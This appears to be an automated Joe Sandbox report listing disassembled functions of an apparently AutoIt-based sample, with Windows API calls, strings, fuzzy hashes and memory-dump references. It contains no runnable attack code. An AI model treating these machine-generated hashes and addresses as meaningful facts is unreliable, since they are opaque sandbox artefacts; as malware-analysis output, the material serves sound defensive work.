Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f593341bcbe6330e00978ebb02a0980a951550114029d8f0dcd49b203c90e46b
Instruction ID: 848362aa6b76fd183cb5c4291a595403b64df151fd850c1811f3d20fa1c7d642
Opcode Fuzzy Hash: f593341bcbe6330e00978ebb02a0980a951550114029d8f0dcd49b203c90e46b
Instruction Fuzzy Hash: 9D2126B1904384AFEB329B248855BEFBBEC9B42308F04049FE79E56251C3785AC5CB19

Function 004692C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0042F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0045AEA5,?,?,00000000,00000008), ref: 0042F282
Part of subcall function 0042F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0045AEA5,?,?,00000000,00000008), ref: 0042F2A6

gethostbyname.WS2_32(?), ref: 004692F0
WSAGetLastError.WS2_32(00000000), ref: 004692FB
_memmove.LIBCMT ref: 00469328
inet_ntoa.WS2_32(?), ref: 00469333

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 4753d732df98ccbdfc1e98e34ebe6315486fd9de1fd472476b2a1fdef614bce5
Instruction ID: fecdc1ebfd1e4d75921259a4f16261e5393c76313bd06c0396dcce691264ac91
Opcode Fuzzy Hash: 4753d732df98ccbdfc1e98e34ebe6315486fd9de1fd472476b2a1fdef614bce5
Instruction Fuzzy Hash: C4119335A001059FCB04FBA1CD46DEE77B9EF18318710406AF506A72A2EB38EE44DB69

Function 0043010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 004345EC: __FF_MSGBANNER.LIBCMT ref: 00434603
Part of subcall function 004345EC: __NMSG_WRITE.LIBCMT ref: 0043460A
Part of subcall function 004345EC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 0043462F

std::exception::exception.LIBCMT ref: 0043013E
__CxxThrowException@8.LIBCMT ref: 00430153

Part of subcall function 00437495: RaiseException.KERNEL32(?,?,0041125D,004C6598,?,?,?,00430158,0041125D,004C6598,?,00000001), ref: 004374E6

Strings

bad allocation, xrefs: 00430137

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: 75459bd6b2cfbd3b4e43352e37e38f390272f0467900ca39e95170248b7937a2
Instruction ID: 8003998c4805ee5708ebecc67e7a10b537499846b0ec54228eb31ee99d8ca04c
Opcode Fuzzy Hash: 75459bd6b2cfbd3b4e43352e37e38f390272f0467900ca39e95170248b7937a2
Instruction Fuzzy Hash: DBF0287540820E76CF25ABE9DC12ADE7BEC9F0C354F10512FF90492182CBB99690D6AD

Function 0041C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0041C00E,?,?,?,?,00000010), ref: 0041C627
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0041C65F
_memmove.LIBCMT ref: 0041C697

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 30307408a358c6f42ee05784989daaf3283dabee55c3048e0c68b8fe910670f7
Instruction ID: c0eeced62a20de7dfa17b469be99c35beb279ce0169768e8e5fa993cb6ccfd15
Opcode Fuzzy Hash: 30307408a358c6f42ee05784989daaf3283dabee55c3048e0c68b8fe910670f7
Instruction Fuzzy Hash: 223139B26402016BDB249B35DC82B6BB7D9EF48310F14453FF85AC7290EB36E850C759

Function 004345EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00434603

Part of subcall function 00438E52: __NMSG_WRITE.LIBCMT ref: 00438E79
Part of subcall function 00438E52: __NMSG_WRITE.LIBCMT ref: 00438E83

__NMSG_WRITE.LIBCMT ref: 0043460A

Part of subcall function 00438EB2: GetModuleFileNameW.KERNEL32(00000000,004D0312,00000104,?,00000001,00430127), ref: 00438F44
Part of subcall function 00438EB2: ___crtMessageBoxW.LIBCMT ref: 00438FF2

Part of subcall function 00431D65: ___crtCorExitProcess.LIBCMT ref: 00431D6B
Part of subcall function 00431D65: ExitProcess.KERNEL32 ref: 00431D74

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 0043462F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bf8f597379800869e00107bc4190650abd01becf455557e09bc194d05f84fb91
Instruction ID: a29247f4e216b8fa56018b2c2dfe626dfbe01a2caeece8ee2daa6269ead1b003
Opcode Fuzzy Hash: bf8f597379800869e00107bc4190650abd01becf455557e09bc194d05f84fb91
Instruction Fuzzy Hash: 1501C8316013019AEA243F25AC13BAA73589FCA765F11203FF60197291DEACAC40896D

Function 0041E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0041E646
DispatchMessageW.USER32(?), ref: 0041E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E664

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 5776dd2b26b59f35befad653f95658e07012c3e7651bce35dcd24275ba237ec4
Instruction ID: 283c672425df027397b57b2d421484e4c86a2762931672a7bd9a26c17d43055a
Opcode Fuzzy Hash: 5776dd2b26b59f35befad653f95658e07012c3e7651bce35dcd24275ba237ec4
Instruction Fuzzy Hash: F6F05E35604345A7DB10E6E28C45BABB3DCAF94340F840C3FBA41C2290D7B8D444872A

Function 0042058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

CALL, xrefs: 004210DB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 5c445c1c544f6a3163b814fe35653cf6782464ce8e4e439dca042b1a7ffd184f
Instruction ID: 88fe243bb68b73c39ce81921e3db7964d6e531a617ea1a0a72730d3e368e7ff7
Opcode Fuzzy Hash: 5c445c1c544f6a3163b814fe35653cf6782464ce8e4e439dca042b1a7ffd184f
Instruction Fuzzy Hash: 65228E70608310DFD724DF15D490A2AB7E1FF84304F54896FE89A8B362D779E885CB8A

Function 00414010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041405A

Strings

EA06, xrefs: 004857B9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: abd1da624b990b33bad416f3ba2ec3d1fe1ae4f8a4dd0ad5a984e840c68cb5f6
Instruction ID: 60e2976196d809dba4466bf2351ab8db766881830ae2d43df840372c957a5238
Opcode Fuzzy Hash: abd1da624b990b33bad416f3ba2ec3d1fe1ae4f8a4dd0ad5a984e840c68cb5f6
Instruction Fuzzy Hash: F541CF31A04154A7CF119B558C557FF7FA28BD9304F28446BEA82D7383C62D8DC183AE

Function 0046013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 004601A9

Strings

0.0.0.0, xrefs: 004601B7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0
API String ID: 856254489-3771769585
Opcode ID: 16c03d129b16b25581745a6fb202523e5a675e09ccb090cceb2d4740ea72d66d
Instruction ID: 58d811683de58697bb1afbe2c5ce852c5f6d96dc037bcf0f5c103e63f8ebf51e
Opcode Fuzzy Hash: 16c03d129b16b25581745a6fb202523e5a675e09ccb090cceb2d4740ea72d66d
Instruction Fuzzy Hash: 1C112735600204DFCB04EF15C981EDAB3A5AF89714B10805FF506AF391EA79ED82C7A9

Function 00413BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00483CF1

Part of subcall function 004131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004131DA

Part of subcall function 00413A67: SHGetMalloc.SHELL32(1<A), ref: 00413A7D
Part of subcall function 00413A67: SHGetDesktopFolder.SHELL32(?), ref: 00413A8F
Part of subcall function 00413A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00413AD2

Part of subcall function 00413B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,004D22E8,?), ref: 00413B65

Strings

X, xrefs: 00483D01

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Path$FullName$DesktopFolderFromListMalloc_memset
String ID: X
API String ID: 2727075218-3081909835
Opcode ID: 034d43822e9e158218c845b8ae8a338ef96642a380f1308e0f73f493bf655a08
Instruction ID: 7cc26d9607db0abb745ff38671197c68218663544d08440dc560d414edc9e883
Opcode Fuzzy Hash: 034d43822e9e158218c845b8ae8a338ef96642a380f1308e0f73f493bf655a08
Instruction Fuzzy Hash: 0A11CDB1A10188ABCF05DF95D8056DE7BF9AF45705F04800FE901B7241DBBC5649CB99

Function 004530AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004530E7

Strings

"M, xrefs: 004530B0

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: "M
API String ID: 4104443479-1273950097
Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
Instruction ID: 93639e4e5d2c5f4148cdb753b90dcaf1985885f950c56443da64f552264824d1
Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
Instruction Fuzzy Hash: 1A01D132200225ABCB249F2DD8919AB77A9EFC5759714802EF90ACB245D631E906C790

Function 004134C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004834AA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID: >>>AUTOIT NO CMDEXECUTE<<<
API String ID: 1029625771-2684727018
Opcode ID: 4de687b49ee5ecc4dcac5d970fbd8c07607aef6a88c6bb251ab6a5ae49e12dfe
Instruction ID: 3e0b7d4bcb3ba689e7c2448524d3d05c3a4656bc9969134ab44b0aa5404a3bea
Opcode Fuzzy Hash: 4de687b49ee5ecc4dcac5d970fbd8c07607aef6a88c6bb251ab6a5ae49e12dfe
Instruction Fuzzy Hash: 33F0497190020DAE9F11FEA1C9519FFB7786A10305B108527A81691141D73C9B4AC725

Function 00456852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00456623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0045685E,?,?,?,00484A5C,004AE448,00000003,?,?), ref: 004566E2

WriteFile.KERNEL32(?,?,"M,00000000,00000000,?,?,?,00484A5C,004AE448,00000003,?,?,00414C44,?,?), ref: 0045686C

Strings

"M, xrefs: 00456864

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$PointerWrite
String ID: "M
API String ID: 539440098-1273950097
Opcode ID: 41406a7055f07d86cd521855809d96925816a8767dce55202c0f827741bd7916
Instruction ID: 2ba0c2cf844703be1f98976a572741f919dc1ff9f20ed7d9447b7245592ad44f
Opcode Fuzzy Hash: 41406a7055f07d86cd521855809d96925816a8767dce55202c0f827741bd7916
Instruction Fuzzy Hash: 93E0B636400218BBDB20AF94D905A8ABBB9EB04354F50452AF94196151D7B5AA14DBA4

Function 0042F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b65d8f45dbf1acf115c34e1fc4fe7891c5da1879ba17acbf12661df4be9e7aa
Instruction ID: 27597e4adece660ae931cd16f42ace54a2997d331e98f6f47092ff4b6e9d461c
Opcode Fuzzy Hash: 1b65d8f45dbf1acf115c34e1fc4fe7891c5da1879ba17acbf12661df4be9e7aa
Instruction Fuzzy Hash: D751C3316043019FCB14EF15D491BAA73E4AF88314F84857EF95A8B392CB38A849CB5A

Function 0045AE06 Relevance: 3.1, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045AEFB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 423a71c7979adbd5a7464e94fc12f25921535497feec92e114fa4ef9e8d2f0d3
Instruction ID: d161fdde2dee9fc0775afc3f34f617239535b1078c90cf94507e5df18c8d490b
Opcode Fuzzy Hash: 423a71c7979adbd5a7464e94fc12f25921535497feec92e114fa4ef9e8d2f0d3
Instruction Fuzzy Hash: BE31E871500214DFCB10EF69D8829AEB7F8EF4C304F64865FE58597243DB79980ACB6A

Function 00468065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00468074
GetForegroundWindow.USER32 ref: 0046807A

Part of subcall function 00466B19: GetWindowRect.USER32(?,?), ref: 00466B2C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$CursorForegroundRect
String ID:
API String ID: 1066937146-0
Opcode ID: e80edd85f52dcbb6d762d870dcc7545578763f77355a4d1f6d81143f38f0f042
Instruction ID: f1dae2e75b934a80675959fe1582c02fed443e7be63d58ef7cc9a4c93406753b
Opcode Fuzzy Hash: e80edd85f52dcbb6d762d870dcc7545578763f77355a4d1f6d81143f38f0f042
Instruction Fuzzy Hash: 58318171A00218AFDB00EFA5DD81AEEB7B4FF09304F10416FE901A7241EB78AE45CB59

Function 00411DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0048DB31
IsWindow.USER32(00000000), ref: 0048DB6B

Part of subcall function 00411F04: GetForegroundWindow.USER32 ref: 00411FBE

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Foreground
String ID:
API String ID: 62970417-0
Opcode ID: 2cafb81e4f6d55e5dc526f37baa3ce02438710a4c15c48ef8c2d3dcbddad9756
Instruction ID: 560c6a94a426ccde1878dace44966f2c8b8610cea7ca2b47c974d6074a5258f4
Opcode Fuzzy Hash: 2cafb81e4f6d55e5dc526f37baa3ce02438710a4c15c48ef8c2d3dcbddad9756
Instruction Fuzzy Hash: F7219372600206AADB10AF75C841BFE77A99F40788F00042EFA5AD7151DB78ED45D768

Function 0044E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON

Download Yara Rule

